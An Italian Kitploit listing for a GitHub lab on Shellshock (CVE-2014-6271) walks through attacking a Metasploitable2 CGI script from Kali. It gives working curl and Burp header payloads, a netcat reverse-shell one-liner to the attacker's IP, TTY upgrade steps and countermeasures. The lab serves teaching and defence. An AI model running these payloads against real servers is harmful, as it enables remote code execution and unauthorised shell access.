Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-6271-Shellshock- — Un laboratorio dimostrativo completo e moderno per CVE-2014-6271 (Shellshock), comprendente architettura, fasi di exploitation, utilizzo di Burp Suite, reverse shell, contromisure e cheat-sheet completo dei comandi. | Kitploit
Strumenti/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
Analisi delle VulnerabilitàExploitReverse EngineeringSfruttamento di Applicazioni WebCTFPenetration TestingCommand and ControlApprendimento e FormazioneRed Teaming
Sviluppo Payload
Lab e Pratica
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

Un laboratorio dimostrativo completo e moderno per CVE-2014-6271 (Shellshock), comprendente architettura, fasi di exploitation, utilizzo di Burp Suite, reverse shell, contromisure e cheat-sheet completo dei comandi.

Vedi Repository
109 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sfruttare Shellshock (CVE-2014-6271): un laboratorio dimostrativo completo e moderno

Shellshock (CVE-2014-6271) è una delle vulnerabilità di esecuzione remota di codice più influenti mai scoperte. Il difetto colpisce Bash e consente agli attaccanti di eseguire comandi arbitrari semplicemente iniettando payload appositamente costruiti nelle variabili d'ambiente.

Questa guida fornisce una dimostrazione completa e riproducibile usando:

  • Kali Linux (attaccante)
  • Metasploitable2 (bersaglio)
  • curl, Burp Suite, Netcat
  • Uno script CGI basato su Bash creato manualmente

È progettata per l'insegnamento, la ricerca, la formazione e la consapevolezza generale della cybersecurity.


📌 Indice dei contenuti

  1. Architettura del laboratorio
  2. Creare lo script CGI vulnerabile
  3. Capire la vulnerabilità Shellshock
  4. Sfruttare Shellshock con curl
  5. Sfruttare Shellshock con Burp Suite
  6. Reverse shell tramite Shellshock
  7. Passare a una TTY completamente interattiva
  8. Diagramma della catena d'attacco
  9. Galleria di screenshot
  10. Contromisure
  11. Cheat Sheet (tutti i comandi)
  12. Sfruttare Shellshock usando Metasploit
  13. Conclusione

1. Architettura del laboratorio

ComponenteRuoloSOIndirizzo IPServizi principali
Kali LinuxAttaccanteKali Linux (ultima versione)192.168.1.4curl, Burp Suite, Netcat
Metasploitable2Server vulnerabile bersaglioUbuntu Linux (MSF2)192.168.1.5Apache 2.2, script CGI, Bash
Apache mod_cgiEsecuzione scriptIn esecuzione su MSF2n/aEspone Bash tramite CGI
shellshock.shPunto di ingresso vulnerabileBash CGIn/aMostra le variabili d'ambiente

Questa semplice configurazione a due nodi rispecchia molte implementazioni legacy ancora presenti nei sistemi industriali e IoT.


2. Creare lo script CGI vulnerabile

Su Metasploitable2:

sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Testa lo script da Kali:

curl http://192.168.1.5/cgi-bin/shellshock.sh

Dovresti vedere le variabili d'ambiente visualizzate.


3. Capire la vulnerabilità Shellshock

Shellshock si verifica quando Bash analizza in modo errato le variabili d'ambiente che ricordano definizioni di funzioni.

Una variabile dannosa come:

() { :; }; /bin/bash -c "id"

farà eseguire a Bash il comando dopo la definizione della funzione — anche se la funzione stessa non viene mai invocata.

Le applicazioni CGI sono particolarmente vulnerabili perché le intestazioni HTTP vengono passate automaticamente agli script come variabili d'ambiente.


4. Sfruttare Shellshock con curl

curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

L'output dovrebbe includere:

Vulnerable
uid=33(www-data)

Questo conferma l'esecuzione remota di codice.


5. Sfruttare Shellshock con Burp Suite

5.1 Invia una richiesta normale

Visita:

http://192.168.1.5/cgi-bin/shellshock.sh

Invia la richiesta a Repeater.

5.2 Inietta il payload Shellshock

Sostituisci l'intestazione User-Agent con:

User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 Risposta

Dovresti vedere:

BurpTest
uid=33(www-data)

Burp Suite conferma la vulnerabilità in modo visivo ed educativo.


6. Reverse shell tramite Shellshock

Avvia il listener su Kali:

nc -lvnp 4444

Attiva la reverse shell tramite lo script CGI:

curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Una shell si ricollegherà a Kali.


7. Passare a una TTY completamente interattiva

All'interno della reverse shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Sospendi la sessione:

Ctrl + Z

Su Kali:

stty raw -echo; fg

Premi Invio.

Ora hai:

  • completamento con il tasto Tab
  • frecce direzionali
  • controllo dei job
  • Bash completamente interattiva

8. Diagramma della catena d'attacco

          ┌────────────────────────┐
          │     Attacker (Kali)    │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Malicious HTTP Header (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache Web Server (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Header → CGI Environment Variable
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Vulnerable)    │
      └───────────┬──────────────┘
                  │
      3. Injected Command Executes
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data Shell Access  │
        └───────────┬─────────────┘
                    │
        4. Reverse Shell → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Full Interactive TTY     │
      └──────────────────────────┘

9. Galleria di screenshot

Una guida visiva alle fasi chiave dell'attacco.

DescrizioneImmagine
Scansione Nmap + output del test Shellshock
Burp Suite – Richiesta Shellshock iniziale
Burp Suite – Iniezione payload / intestazione
Reverse shell ricevuta su Kali (nc)

10. Contromisure

✔ 1. Aggiorna Bash

Applica una patch per passare a una versione che gestisca correttamente il parsing delle funzioni.

✔ 2. Disabilita CGI

Il CGI legacy introduce un rischio sistemico non necessario.

✔ 3. Sanifica le intestazioni HTTP

Elimina i pattern sospetti come:

() { :; };

✔ 4. Usa il principio del minimo privilegio

Limita i permessi dell'utente del server web (www-data).

✔ 5. Restrizioni sulle connessioni in uscita

Blocca le reverse shell e l'esfiltrazione dei dati.

✔ 6. Implementa un Web Application Firewall (WAF)

Le firme WAF moderne rilevano Shellshock immediatamente.

✔ 7. Abilita SELinux / AppArmor

Contiene i processi Bash e blocca comportamenti indesiderati.

✔ 8. Esegui scansioni di vulnerabilità regolari

Scarica lo strumento